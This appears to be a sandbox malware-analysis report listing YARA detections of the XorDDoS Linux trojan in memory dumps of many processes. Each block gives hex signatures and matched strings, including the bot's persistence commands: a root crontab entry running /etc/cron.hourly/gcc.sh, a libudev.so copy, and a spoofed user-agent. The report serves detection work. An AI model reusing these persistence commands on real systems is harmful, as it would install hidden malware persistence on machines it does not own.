6554.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6422.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6386.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6488.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6420.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6296.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
